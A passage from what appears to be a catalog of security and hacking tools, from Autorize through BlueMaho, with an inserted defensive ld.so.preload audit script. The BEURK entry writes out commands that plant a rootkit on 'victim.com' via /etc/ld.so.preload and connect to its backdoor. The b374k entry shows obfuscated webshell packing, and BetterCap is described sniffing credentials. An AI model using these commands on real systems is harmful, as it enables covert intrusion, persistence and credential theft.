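    admin_page = Response(200, '{"users": ["alice", "bob"], "role": "admin"}')
    denied = Response(403, "You are not authorized to perform action")
    empty_detector = EnforcementDetector()
    fingerprint_detector = EnforcementDetector(
        fingerprints=["You are not authorized to perform action"],
    )
    length_detector = EnforcementDetector(content_lengths={denied.content_length})
    return {
        "same_body_for_low_priv": classify(admin_page, admin_page, empty_detector),
        "denied_no_filter": classify(admin_page, denied, empty_detector),
        "denied_fingerprint": classify(admin_page, denied, fingerprint_detector),
        "denied_content_length": classify(admin_page, denied, length_detector),
        # A denial worded differently from the configured fingerprint stays
        # UNKNOWN until a filter covering it is added.
        "denied_other_wording": classify(admin_page, Response(403, "Forbidden"), fingerprint_detector),
    }


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name:24s} -> {status}")
```

The point of checking the filters first is that a denial page can coincidentally share status code and length with some legitimate pages; the fingerprint is the only positive evidence of enforcement, so it should win over the equality heuristic.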

Download Autorize
AVCAESAR - MALWARE ANALYSIS ENGINE AND
REPOSITORY

AVCaesar is a malware analysis engine and repository,
developed by malware.lu within the FP7 project CockpitCI.

Functionalities

AVCaesar can be used to:

Perform an efficient malware analysis of suspicious files
based on the results of a set of antivirus solutions,
bundled together to reach the highest possible probability
of detecting potential malware;
Search for malware samples in a progressively increasing
malware repository.

The basic functionalities can be extended by:

Downloading malware samples (15 samples/day for
registered users and 100 samples/day for premium users);
Performing confidential malware analysis (reserved to
premium users).

Malware analysis process

The malware analysis process is kept as easy and intuitive as
possible for AVCaesar users:
Submit a suspicious file via the AVCaesar web interface.
Premium users can choose to perform a confidential
analysis.
Receive a well-structured malware analysis report.

AVCaesar - Malware Analysis Engine and Repository
B374K - PHP WEBSHELL WITH HANDY FEATURES

This PHP shell is a useful tool for a system or web administrator
to do remote management without using cPanel or connecting
using SSH, FTP, etc. All actions take place within a web browser.

Features:

File manager (view, edit, rename, delete, upload,
download, archiver, etc.)
Search file, file content, folder (also using regex)
Command execution
Script execution (php, perl, python, ruby, java, node.js, c)
Give you shell via bind/reverse shell connect
Simple packet crafter
Connect to DBMS (mysql, mssql, oracle, sqlite,
postgresql, and many more using ODBC or PDO)
SQL Explorer
Process list/Task manager
Send mail with attachment (you can attach a local file on the
server)
String conversion

All of that in only 1 file, no installation needed.
Supports PHP > 4.3.3 and PHP 5.

Requirements:

PHP version > 4.3.3 and PHP 5
As it uses zepto.js v1.1.2, you need a modern browser to
use the b374k shell. See browser support on the zepto.js website
http://zeptojs.com/
Responsibility for what you do with this shell

Installation:

Download b374k.php (default password: b374k), edit and
change the password and upload b374k.php to your server;
the password is in sha1(md5()) format. Or create your own
b374k.php, as explained below.
Customize:

After you have finished editing the files, upload index.php, base,
module, theme and all files inside them to a server.

Using Web Browser:
Open index.php in your browser; quick run will only run the
shell. Use the packer to pack all files into a single PHP file. Set all the
options available and the output file will be in the same
directory as index.php.

Using Console:
$ php -f index.php
b374k shell packer 0.4
options :
-o filename                               save as filename
-p password                               protect with password
-t theme                                  use theme
-m modules                                modules to pack separated by comma
-s                                        strip comments and whitespaces
-b                                        encode with base64
-z [no|gzdeflate|gzencode|gzcompress]     compression (use only with -b)
-c [0-9]                                  level of compression
-l                                        list available modules
-k                                        list available themes

example :
$ php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9

Don't forget to delete index.php, base, module, theme and all
files inside them after you have finished, because they are not protected with
a password and so can be a security threat to your server.

Download B374K
BABUN - A WINDOWS SHELL YOU WILL LOVE!

Would you like to use a Linux-like console on a Windows host
without a lot of fuss? Try out babun!

Installation

Just download the dist file from http://babun.github.io, unzip it
and run the install.bat script. After a few minutes babun starts
automatically. The application will be installed to the
%USER_HOME%\.babun directory. Use the /target option to install
babun to a custom directory.

Features in 10 seconds

Babun features the following:
Pre-configured Cygwin with a lot of addons
Silent command-line installer, no admin rights required
pact - advanced package manager (like apt-get or yum)
xTerm-256 compatible console
HTTP(s) proxying support
Plugin-oriented architecture
Pre-configured git and shell
Integrated oh-my-zsh
Auto update feature
"Open Babun Here" context menu entry
Features in 3 minutes

Cygwin
The core of Babun consists of a pre-configured Cygwin. Cygwin
is a great tool, but there's a lot of quirks and tricks that make
you lose a lot of time to make it actually usable. Not only does
babun solve most of these problems, but it also contains a lot of
vital packages, so that you can be productive from the very first
minute.

Package manager
Babun provides a package manager called pact. It is similar to
apt-get or yum. Pact enables installing/searching/upgrading
and deinstalling cygwin packages with no hassle at all. Just
invoke pact --help to check how to use it.

Shell
Babun's shell is tweaked in order to provide the best possible
user experience. There are two shell types that are preconfigured
and available right away - bash and zsh (zsh is the
default one). Babun's shell features:
syntax highlighting
UNIX tools
software development tools
git-aware prompt
custom scripts and aliases
and much more!

Console
Mintty is the console used in babun. It features an xterm-256
mode, nice fonts and simply looks great!

Proxying
Babun supports HTTP proxying out of the box. Just add the
address and the credentials of your HTTP proxy server to
the .babunrc file located in your home folder and execute
source .babunrc to enable HTTP proxying. SOCKS proxies
are not supported for now.

Developer tools
Babun provides many packages, convenience tools and scripts
that make your life much easier. The long list of features
includes:
programming languages (Python, Perl, etc.)
git (with a wide variety of aliases and tweaks)
UNIX tools (grep, wget, curl, etc.)
vcs (svn, git)
oh-my-zsh
custom scripts (pbcopy, pbpaste, babun, etc.)

Plugin architecture
Babun has a very small microkernel (cygwin, a couple of bash
scripts and a bit of a convention) and a plugin architecture on
top of it. It means that almost everything is a plugin in the
babun world! Not only does it structure babun in a clean way,
but it also enables others to contribute small chunks of code.
Currently, babun comprises the following plugins:
cacert
core
git
oh-my-zsh
pact
cygdrive
dist
shell

Auto-update
Self-update is at the very heart of babun! Many Cygwin tools
are simple bash scripts - once you install them there is no
chance of getting the newer version in a smooth way. You
either delete the older version or overwrite it with the newest
one, losing all the changes you have made in between.
Babun contains an auto-update feature which enables updating
both the microkernel, the plugins and even the underlying
cygwin. Files located in your home folder will never be deleted
nor overwritten, which preserves your local config and
customizations.

Installer
Babun features a silent command-line installation script that
may be executed without admin rights on any Windows host.
Using babun

Setting up proxy
To set up a proxy, uncomment the following lines in the .babunrc file
(%USER_HOME%\.babun\cygwin\home\USER\.babunrc):
# Uncomment this lines to set up your proxy
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost

Setting up git

Babun has a pre-configured git. The only thing you should do
after the installation is to add your name and email to the git
config:
git config --global user.name "your name"
git config --global user.email "your@email.com"

There's a lot of great git aliases provided by the git plugin:

gitalias['alias.cp']='cherry-pick'
gitalias['alias.st']='status -sb'
gitalias['alias.cl']='clone'
gitalias['alias.ci']='commit'
gitalias['alias.co']='checkout'
gitalias['alias.br']='branch'
gitalias['alias.dc']='diff --cached'
gitalias['alias.lg']="log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %Cblue<%an>%Creset' --abbrev-commit --date=relative --all"
gitalias['alias.last']='log -1 --stat'
gitalias['alias.unstage']='reset HEAD --'
Installing and removing packages

Babun is shipped with pact - a Linux-like package manager. It
uses the cygwin repository for downloading packages:
{ ~ } pact install arj
Working directory is /setup
Mirror is http://mirrors.kernel.org/sourceware/cygwin/
setup.ini taken from the cache
Installing arj
Found package arj
--2014-03-30 19:34:38-- http://mirrors.kernel.org/sourceware/cygwin//x86/release/arj/arj-3.10.22-1.tar.bz2
Resolving mirrors.kernel.org (mirrors.kernel.org)... 149.20.20.135, 149.20.4.71, 2001:4f8:1:10:0:1994:3:14, ...
Connecting to mirrors.kernel.org (mirrors.kernel.org)|149.20.20.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 189944 (185K) [application/x-bzip2]
Saving to: `arj-3.10.22-1.tar.bz2'
100%[=======================================>] 189,944     193K/s   in 1.0s
2014-03-30 19:34:39 (193 KB/s) - `arj-3.10.22-1.tar.bz2' saved [189944/189944]
Unpacking...
Package arj installed

Here's the list of all pact's features:

{ ~ } pact --help
pact: Installs and removes Cygwin packages.

Usage:
"pact install <package names>" to install given packages
"pact remove <package names>" to remove given packages
"pact update <package names>" to update given packages
"pact show" to show installed packages
"pact find <patterns>" to find packages matching patterns
"pact describe <patterns>" to describe packages matching patterns
"pact packageof <commands or files>" to locate parent packages
"pact invalidate" to invalidate pact caches (setup.ini, etc.)
Options:
--mirror, -m <url> : set mirror
--invalidate, -i   : invalidates pact caches (setup.ini, etc.)
--force, -f : force the execution
--help
--version

Changing the default shell

The zsh (with .oh-my-zsh) is the default babun shell.
Executing the following command will output your default shell:
{ ~ } babun shell
/bin/zsh

In order to change your default shell execute:

{ ~ } babun shell /bin/bash
/bin/zsh
/bin/bash

The output contains two lines: the previous default shell and the
new default shell.

Checking the configuration

Execute the following command to check the configuration:

{ ~ } babun check
Executing babun check
Prompt speed     [OK]
Connection check [OK]
Update check     [OK]
Cygwin check     [OK]

By executing this command you can also check whether there
is a newer cygwin version available:
{ ~ } babun check
Executing babun check
Prompt speed     [OK]
Connection check [OK]
Update check     [OK]
Cygwin check     [OUTDATED]
Hint: the underlying Cygwin kernel is outdated. Execute
'babun update' and follow the instructions!

It will check if there are problems with the speed of the git
prompt, if there's access to the Internet or finally if you are
running the newest version of babun.
The command will output hints if problems occur:
{ ~ } babun check
Executing babun check
Prompt speed     [SLOW]
Hint: your prompt is very slow. Check the installed 'BLODA' software.
Connection check [OK]
Update check     [OK]
Cygwin check     [OK]

On each startup, but only every 24 hours, babun will execute
this check automatically. You can disable the automatic check
in the ~/.babunrc file.
Tweaking the configuration
You can tweak some config options in the ~/.babunrc file.
Here's the full list of variables that may be modified:
# JVM options
export JAVA_OPTS="-Xms128m -Xmx256m"
# Modify these lines to set your locale
export LANG="en_US.UTF-8"
export LC_CTYPE="en_US.UTF-8"
export LC_ALL="en_US.UTF-8"
# Uncomment these lines to the set your machine's default locale (and comment out the UTF-8 ones)
# export LANG=$(locale -uU)
# export LC_CTYPE=$(locale -uU)
# export LC_ALL=$(locale -uU)
# Uncomment this to disable daily auto-update & proxy checks on startup (not recommended!)
# export DISABLE_CHECK_ON_STARTUP="true"
# Uncomment to increase/decrease the check connection timeout
# export CHECK_TIMEOUT_IN_SECS=4
# Uncomment this lines to set up your proxy
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost

Updating babun
To update babun to the newest version execute:
babun update

Please note that your local configuration files will not be
overwritten.
The babun update command will also update the underlying
cygwin version if a newer version is available. In such case babun
will download the new cygwin installer, close itself and start the
cygwin installation process. Once the cygwin installation is
completed babun will restart.

Screenshots: Startup screen; Pact - package installation; Pact - package installed; Babun oh-my-zsh - auto-update; VIM syntax highlighting; Nano syntax highlighting; Git aliases - git lg; Git aliases - git st; Shell prompt; Babun update; Open Babun here - Context Menu

Download Babun
BACKBOX LINUX 4.2 - UBUNTU-BASED LINUX
DISTRIBUTION PENETRATION TEST AND SECURITY
ASSESSMENT

BackBox is a Linux distribution based on Ubuntu. It has been
developed to perform penetration tests and security
assessments. Designed to be fast, easy to use and provide a
minimal yet complete desktop environment, thanks to its own
software repositories, always being updated to the latest stable
version of the most used and best known ethical hacking tools.
The BackBox Team is pleased to announce the updated
release of BackBox Linux, version 4.2! This release
includes features such as Linux Kernel 3.16 and Ruby 2.1.

What's new
Preinstalled Linux Kernel 3.16
New Ubuntu 14.04.2 base
Ruby 2.1
Installer with LVM and Full Disk Encryption options
Handy Thunar custom actions
RAM wipe at shutdown/reboot
System improvements
Upstream components
Bug corrections
Performance boost
Improved Anonymous mode
Predisposition to ARM architecture (armhf Debian packages)
Predisposition to BackBox Cloud platform
New and updated hacking tools: beef-project, crunch,
fang, galleta, jd-gui, metasploit-framework, pasco, pyew,
rifiuti2, setoolkit, theharvester, tor, torsocks, volatility,
weevely, whatweb, wpscan, xmount, yara, zaproxy

System requirements
32-bit or 64-bit processor
512 MB of system memory (RAM)
6 GB of disk space for installation
Graphics card capable of 800x600 resolution
DVD-ROM drive or USB port (2 GB)

Download BackBox Linux 4.2


BACKBOX LINUX 4.3 - UBUNTU-BASED LINUX
DISTRIBUTION PENETRATION TEST AND SECURITY
ASSESSMENT

BackBox is a Linux distribution based on Ubuntu. It has been
developed to perform penetration tests and security
assessments. Designed to be fast, easy to use and provide a
minimal yet complete desktop environment, thanks to its own
software repositories, always being updated to the latest stable
version of the most used and best known ethical hacking tools.

What's new
Preinstalled Linux Kernel 3.16
New Ubuntu 14.04.2 base
Ruby 2.1
Installer with LVM and Full Disk Encryption options
Handy Thunar custom actions
RAM wipe at shutdown/reboot
System improvements
Upstream components
Bug corrections
Performance boost
Improved Anonymous mode
Predisposition to ARM architecture (armhf Debian packages)
Predisposition to BackBox Cloud platform
New and updated hacking tools: beef-project, btscanner,
dirs3arch, metasploit-framework, ophcrack, setoolkit, tor,
weevely, wpscan, etc.

System requirements
32-bit or 64-bit processor
512 MB of system memory (RAM)
6 GB of disk space for installation
Graphics card capable of 800x600 resolution
DVD-ROM drive or USB port (2 GB)

Upgrade instructions

To upgrade from a previous version (BackBox 4.x) follow these
instructions:
sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f
sudo apt-get install linux-image-generic-lts-utopic linux-headers-generic-lts-utopic linux-signed-image-generic-lts-utopic
sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backbox-desktop backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstall
sudo apt-get autoremove --purge

Download BackBox Linux 4.3


BACKBOX LINUX 4.4 - UBUNTU-BASED LINUX
DISTRIBUTION PENETRATION TEST AND SECURITY
ASSESSMENT

BackBox is a Linux distribution based on Ubuntu. It has been
developed to perform penetration tests and security
assessments. Designed to be fast, easy to use and provide a
minimal yet complete desktop environment, thanks to its own
software repositories, always being updated to the latest stable
version of the most used and best known ethical hacking tools.
The release has some special new features included to keep
BackBox up to date with the latest developments in the security world.
Tools such as OpenVAS and Automotive Analysis will make a
big difference. BackBox 4.4 also comes with Kernel 3.19.

What's new
Preinstalled Linux Kernel 3.19
New Ubuntu 14.04.3 base
Ruby 2.1
Installer with LVM and Full Disk Encryption options
Handy Thunar custom actions
RAM wipe at shutdown/reboot
System improvements
Upstream components
Bug corrections
Performance boost
Improved Anonymous mode
Automotive Analysis category
Predisposition to ARM architecture (armhf Debian packages)
Predisposition to BackBox Cloud platform
New and updated hacking tools: apktool, armitage, beef-project,
can-utils, dex2jar, fimap, jd-gui, metasploit-framework,
openvas, setoolkit, sqlmap, tor, weevely, wpscan, zaproxy, etc.

System requirements
32-bit or 64-bit processor
512 MB of system memory (RAM)
6 GB of disk space for installation
Graphics card capable of 800x600 resolution
DVD-ROM drive or USB port (2 GB)

Upgrade instructions

To upgrade from a previous version (BackBox 4.x) follow these
instructions:
sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f
sudo apt-get install linux-image-generic-lts-vivid linux-headers-generic-lts-vivid linux-signed-image-generic-lts-vivid
sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backbox-desktop backbox-menu backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstall
sudo apt-get autoremove --purge
sudo apt-get install openvas sqlite3
sudo openvas-launch sync
sudo openvas-launch start

Download BackBox Linux 4.4


BACULA - NETWORK BACKUP TOOL FOR LINUX, UNIX,
MAC, AND WINDOWS

Bacula is a set of computer programs that permits the system
administrator to manage backup, recovery, and verification of
computer data across a network of computers of different kinds.
Bacula can also run entirely upon a single computer and can
backup to various types of media, including tape and disk.
In technical terms, it is a network Client/Server based backup
program. Bacula is relatively easy to use and efficient, while
offering many advanced storage management features that
make it easy to find and recover lost or damaged files. Due to
its modular design, Bacula is scalable from small single
computer systems to systems consisting of hundreds of
computers located over a large network.

Who Needs Bacula?

If you are currently using a program such as tar, dump, or bru
to backup your computer data, and you would like a network
solution, more flexibility, or catalog services, Bacula will most
likely provide the additional features you want. However, if you
are new to Unix systems or do not have offsetting experience
with a sophisticated backup package, the Bacula project does
not recommend using Bacula as it is much more difficult to
setup and use than tar or dump.
If you want Bacula to behave like the above mentioned simple
programs and write over any tape that you put in the drive, then
you will find working with Bacula difficult. Bacula is designed to
protect your data following the rules you specify, and this
means reusing a tape only as the last resort. It is possible to
force Bacula to write over any tape in the drive, but it is easier
and more efficient to use a simpler program for that kind of
operation.
If you would like a backup program that can write to multiple
volumes (i.e. is not limited by your tape drive capacity), Bacula
can most likely fill your needs. In addition, quite a number of
Bacula users report that Bacula is simpler to setup and use
than other equivalent programs.
If you are currently using a sophisticated commercial package
such as Legato Networker, ARCserveIT, Arkeia, or
PerfectBackup+, you may be interested in Bacula, which
provides many of the same features and is free software
available under the GNU Version 2 software license.

Bacula Components or Services

Bacula is made up of the following five major components or
services: Director, Console, File, Storage, and Monitor
services.

Bacula Director
The Bacula Director service is the program that supervises all
the backup, restore, verify and archive operations. The system
administrator uses the Bacula Director to schedule backups
and to recover files. For more details see the Director Services
Daemon Design Document in the Bacula Developers Guide.
The Director runs as a daemon (or service) in the background.

Bacula Console
The Bacula Console service is the program that allows the
administrator or user to communicate with the Bacula Director.
Currently, the Bacula Console is available in three versions:
text-based console interface, QT-based interface, and a
wxWidgets graphical interface. The first and simplest is to run
the Console program in a shell window (i.e. TTY interface).
Most system administrators will find this completely adequate.
The second version is a GNOME GUI interface that is far from
complete, but quite functional as it has most of the capabilities of
the shell Console. The third version is a wxWidgets GUI with an
interactive file restore. It also has most of the capabilities of the
shell console, allows command completion with tabulation, and
gives you instant help about the command you are typing. For
more details see the Bacula Console Design Document.

Bacula File
The Bacula File service (also known as the Client program) is
the software program that is installed on the machine to be
backed up. It is specific to the operating system on which it
runs and is responsible for providing the file attributes and data
when requested by the Director. The File services are also
responsible for the file system dependent part of restoring the
file attributes and data during a recovery operation. For more
details see the File Services Daemon Design Document in the
Bacula Developers Guide. This program runs as a daemon on
the machine to be backed up. In addition to Unix/Linux File
daemons, there is a Windows File daemon (normally distributed
in binary format). The Windows File daemon runs on current
Windows versions (NT, 2000, XP, 2003, and possibly Me and
98).
Bacula Storage
The Bacula Storage services consist of the software programs
that perform the storage and recovery of the file attributes and
data to the physical backup media or volumes. In other words,
the Storage daemon is responsible for reading and writing your
tapes (or other storage media, e.g. files). For more details see
the Storage Services Daemon Design Document in the Bacula
Developers Guide. The Storage services run as a daemon on
the machine that has the backup device (usually a tape drive).

Catalog
The Catalog services are comprised of the software programs
responsible for maintaining the file indexes and volume
databases for all files backed up. The Catalog services permit
the system administrator or user to quickly locate and restore
any desired file. The Catalog services set Bacula apart from
simple backup programs like tar and bru, because the catalog
maintains a record of all Volumes used, all Jobs run, and all
Files saved, permitting efficient restoration and Volume
management. Bacula currently supports three different
databases, MySQL, PostgreSQL, and SQLite, one of which
must be chosen when building Bacula.
The three SQL databases currently supported (MySQL,
PostgreSQL or SQLite) provide quite a number of features,
including rapid indexing, arbitrary queries, and security.
Although the Bacula project plans to support other major SQL
databases, the current Bacula implementation interfaces only to
MySQL, PostgreSQL and SQLite. For the technical and porting
details see the Catalog Services Design Document in the
developers documentation.
The packages for MySQL and PostgreSQL are available for
several operating systems. Alternatively, installing from the
source is quite easy; see the Installing and Configuring
MySQL chapter of this document for the details.
For more information on MySQL, please see:
http://www.mysql.com. Or see the Installing
and Configuring PostgreSQL chapter of this
document for the details. For more information on PostgreSQL,
please see: http://www.postgresql.org.
Configuring and building SQLite is even easier. For the details
of configuring SQLite, please see the Installing and Configuring
SQLite chapter of this document.

Bacula Monitor
A Bacula Monitor service is the program that allows the
administrator or user to watch the current status of Bacula
Directors, Bacula File Daemons and Bacula Storage Daemons.
Currently, only a GTK+ version is available, which works with
GNOME, KDE, or any window manager that supports the
FreeDesktop.org system tray standard.
To perform a successful save or restore, the following four
daemons must be configured and running: the Director
daemon, the File daemon, the Storage daemon, and the
Catalog service (MySQL, PostgreSQL or SQLite).

Download Bacula
BEESWARM - ACTIVE IDS MADE EASY

Beeswarm is an active IDS project that provides easy configuration, deployment and management of honeypots and clients. The system operates by luring the hacker into the honeypots by setting up a deception infrastructure where deployed drones communicate with honeypots and intentionally leak credentials while doing so. The project has been released in a beta version; a stable version is expected within three months.
Installing and starting the server

On the VM to be set up as the server, perform the following steps. Make sure to write down the administrative password.
$ sudo apt-get install libffi-dev build-essential python-dev python-pip libssl-dev libxml2-dev libxslt1-dev
$ pip install pydes --allow-external pydes --allow-unverified pydes
$ pip install beeswarm
Downloading/unpacking beeswarm
...
Successfully installed Beeswarm
Cleaning up...
$ mkdir server_workdir
$ cd server_workdir/
$ beeswarm --server
...
****************************************************************************
Default password for the admin account is: uqbrlsabeqpbwy
****************************************************************************
...

Download Beeswarm

BETTERCAP - A COMPLETE, MODULAR, PORTABLE AND EASILY EXTENSIBLE MITM FRAMEWORK

BetterCap is an attempt to create a complete, modular, portable and easily extensible MITM framework with every kind of feature that could be needed while performing a man in the middle attack.
It's currently able to sniff and print from the network the following information:
URLs being visited.
HTTPS hosts being visited.
HTTP POSTed data.
FTP credentials.
IRC credentials.
POP, IMAP and SMTP credentials.
NTLMv1/v2 (HTTP, SMB, LDAP, etc.) credentials.
DEPENDS

colorize (gem install colorize)
packetfu (gem install packetfu)
pcaprub (gem install pcaprub) [sudo apt-get install ruby-dev libpcap-dev]

Download BetterCap
BEURK - EXPERIMENTAL UNIX ROOTKIT
BEURK is a userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.
NOTE: BEURK is a recursive acronym for BEURK Experimental Unix RootKit.
Features

Hide attacker files and directories
Realtime log cleanup (on utmp/wtmp)
Anti process and login detection
Bypass unhide, lsof, ps, ldd, netstat analysis
Furtive PTY backdoor client

Upcoming features

ptrace(2) hooking for anti-debugging
libpcap hooking undermines local sniffers
PAM backdoor for local privilege escalation

Usage

Compile
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make

Install
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'

Enjoy !
./client.py victim_ip:port # connect with furtive backdoor

Dependencies

The following packages are not required in order to build BEURK at the moment:
libpcap - to avoid local sniffing
libpam - for local PAM backdoor
libssl - for encrypted backdoor connection
Example on debian:
apt-get install libpcap-dev libpam-dev libssl-dev
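As an added defender-side check, not part of BEURK or its README: the install step above persists by appending a library path to /etc/ld.so.preload, so auditing that file is the matching detection. The allowlist, the suspicious-prefix list and the sample file content are assumptions constructed for this example.

```python
import os
import stat

# Assumption: a legitimate preload library never lives under a scratch or
# user-writable area, so these prefixes are treated as red flags outright.
SUSPICIOUS_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/", "/run/user/")


def parse_preload(text):
    """Library paths listed in ld.so.preload text: whitespace-separated, '#' starts a comment."""
    entries = []
    for line in text.splitlines():
        entries.extend(line.split("#", 1)[0].split())
    return entries


def audit_preload_text(text, allowlist=()):
    """Return (path, reason) pairs for entries that should not be in the file.

    The normal state on most hosts is that the file is absent or empty, so
    every entry outside the allowlist is reported, with the most damning
    reason first.
    """
    findings = []
    for path in parse_preload(text):
        if not path.startswith("/"):
            findings.append((path, "relative path"))
        elif path.startswith(SUSPICIOUS_PREFIXES):
            findings.append((path, "library under a scratch or user directory"))
        elif path not in allowlist:
            findings.append((path, "not on the allowlist"))
    return findings


def audit_preload_file(path="/etc/ld.so.preload", allowlist=()):
    """Audit the live file, adding existence, ownership and permission checks per library."""
    if not os.path.exists(path):
        return []
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings = audit_preload_text(text, allowlist)
    for lib in parse_preload(text):
        if not os.path.exists(lib):
            findings.append((lib, "listed library does not exist"))
            continue
        st = os.stat(lib)
        if st.st_uid != 0:
            findings.append((lib, "not owned by root"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((lib, "group- or world-writable"))
    return findings


# Constructed sample: the exact line the install step above appends.
SAMPLE_PRELOAD = "# preload libs\n/lib/libselinux.so\n"

if __name__ == "__main__":
    for finding in audit_preload_text(SAMPLE_PRELOAD) + audit_preload_file():
        print("%s: %s" % finding)
```

A name that mimics a real library is not evidence of legitimacy (the install step picks libselinux.so for exactly that reason), so confirm an entry belongs to an installed package, for example with dpkg -S on Debian-based systems, before allowlisting it.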

Download Beurk
BLACKARCH LINUX V2015.07.31 - PENETRATION TESTING DISTRIBUTION

BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1239 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.
The new ISOs include over 1230 tools for i686 and x86_64 and over 1010 tools. For more details see the ChangeLog below.

ChangeLog v2015.07.31

added more than 30 new tools
updated system packages including linux kernel 4.1.3
updated all tools
added new color config for vim
replaced splash.png
deleted blackarch-install.txt
updated /root/README
fixed typos in ISO config files

Download BlackArch Linux v2015.07.31

BLACKARCH LINUX V2015.11.24 - PENETRATION TESTING DISTRIBUTION

BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1308 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.
The BlackArch Live ISO contains multiple window managers.
ChangeLog v2015.11.24:

added more than 100 new tools
updated system packages including linux kernel 4.2.5
updated all tools
updated menu entries for window managers
added (correct) multilib support
added more fonts
added missing group 'vboxsf'

Download BlackArch Linux v2015.11.24

BLACKBONE - WINDOWS MEMORY HACKING LIBRARY
Blackbone, Windows Memory Hacking Library
Features

x86 and x64 support
Process interaction
  Manage PEB32/PEB64
  Manage process through WOW64 barrier
Process Memory
  Allocate and free virtual memory
  Change memory protection
  Read/Write virtual memory
Process modules
  Enumerate all (32/64 bit) modules loaded.
  Enumerate modules using Loader list/Section objects/PE headers methods.
  Get exported function address
  Get the main module
  Unlink module from loader lists
  Inject and eject modules (including pure IL images)
  Inject 64bit modules into WOW64 processes
  Manually map native PE images
Threads
  Enumerate threads
  Create and terminate threads. Support for cross-session thread creation.
  Get thread exit code
  Get main thread
  Manage TEB32/TEB64
  Join threads
  Suspend and resume threads
  Set/Remove hardware breakpoints
Pattern search
  Search for arbitrary pattern in local or remote process
Remote code execution
  Execute functions in remote process
  Assemble own code and execute it remotely
  Support for cdecl/stdcall/thiscall/fastcall conventions
  Support for arguments passed by value, pointer or reference, including structures
  FPU types are supported
  Execute code in new thread or any existing one
Remote hooking
  Hook functions in remote process using int3 or hardware breakpoints
  Hook functions upon return
Manual map features
  x86 and x64 image support
  Mapping into any arbitrary unprotected process
  Section mapping with proper memory protection flags
  Image relocations (only 2 types supported. I haven't seen a single PE image with some other relocation types)
  Imports and Delayed imports are resolved
  Bound import is resolved as a side effect, I think
  Module exports
  Loading of forwarded export images
  Api schema name redirection
  SxS redirection and isolation
  Activation context support
  Dll path resolving similar to native load order
  TLS callbacks. Only for one thread and only with PROCESS_ATTACH/PROCESS_DETACH reasons.
  Static TLS
  Exception handling support (SEH and C++)
  Adding module to some native loader structures (for basic module api support: GetModuleHandle, GetProcAddress, etc.)
  Security cookie initialization
  C++/CLI images are supported
  Image unloading
  Increase reference counter for import libraries in case of manual import mapping
  Cyclic dependencies are handled properly
Driver features
  Allocate/free/protect user memory
  Read/write user and kernel memory
  Disable permanent DEP for WOW64 processes
  Change process protection flag
  Change handle access rights
  Remap process memory
  Hiding allocated user-mode memory
  User-mode dll injection and manual mapping
  Manual mapping of drivers

Download Blackbone
BLUEMAHO - BLUETOOTH SECURITY TESTING SUITE

BlueMaho is a GUI shell (interface) for a suite of tools for testing the security of Bluetooth devices. It is freeware, open source, written in Python and uses wxPython. It can be used for testing BT devices for known vulnerabilities and, the major thing, for testing to find unknown vulns. It can also form nice statistics.

What can it do? (features)

scan for devices, show advanced info, SDP records, vendor etc
track devices - show where and how many times a device was seen, its name changes
loop scan - it can scan all the time, showing you online devices
alerts with sound if a new device is found
on_new_device - you can specify what command it should run when it finds a new device
it can use separate dongles - one for scanning (loop scan) and one for running tools or exploits
send files
change name, class, mode, BD_ADDR of local HCI devices
save results in database
form nice statistics (unique devices by day/hour, vendors, services etc)
test remote device for known vulnerabilities (see exploits for more details)
test remote device for unknown vulnerabilities (see tools for more details)
themes! you can customize it

What tools and exploits does it consist of?

Tools:
atshell.c by Bastian Ballmann (modified attest.c by Marcel Holtmann)
bccmd by Marcel Holtmann
bdaddr.c by Marcel Holtmann
bluetracker.py by smiley
carwhisperer v0.2 by Martin Herfurt
psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin R. Mulliner
BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
btftp v0.1 by Marcel Holtmann
btobex v0.1 by Marcel Holtmann
greenplaque v1.5 by digitalmunition.com
L2CAP packetgenerator by Bastian Ballmann
obex stress tests 0.1
redfang v2.50 by Ollie Whitehouse
ussp-push v0.10 by Davide Libenzi
Exploits/attacks:
Bluebugger v0.1 by Martin J. Muench
bluePIMp by Kevin Finisterre
BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
helomoto by Adam Laurie
hidattack v0.1 by Collin R. Mulliner
Mode 3 abuse attack
Nokia N70 l2cap packet DoS PoC by Pierre Betouin
opush abuse (prompts flood) DoS attack
Sony-Ericsson reset display PoC by Pierre Betouin
You can add your own tools by editing 'exploits/exploits.lst' and 'tools/tools.lst'.

Requirements

OS (tested with Debian 4.0 Etch / 2.6.18)
python (python 2.4 http://www.python.org)
wxPython (python-wxgtk2.6 http://www.wxpython.org)
BlueZ (3.9/3.24) http://www.bluez.org
